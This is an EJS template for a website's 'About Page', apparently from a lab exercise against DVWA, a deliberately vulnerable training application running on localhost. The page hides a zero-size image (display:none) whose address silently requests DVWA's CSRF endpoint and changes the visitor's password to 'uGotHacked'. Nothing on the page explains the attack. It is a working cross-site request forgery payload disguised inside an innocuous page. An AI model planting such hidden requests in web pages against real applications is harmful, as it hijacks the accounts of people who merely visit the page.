<!DOCTYPE html>
<html lang="en">
<head>
  <%- include('../partials/head'); %>
</head>
<body>
    <header>
      <%- include('../partials/header'); %>
    </header>
    
    <main>
      <div>
        <h1>About Page</h1>
        <img style="display:none" src="http://127.0.0.1/DVWA/vulnerabilities/csrf/?password_new=uGotHacked&password_conf=uGotHacked&Change=Change" alt=""> 
      </div>
    </main>

    <footer>
      <%- include('../partials/footer'); %>
    </footer>

</body>
</html>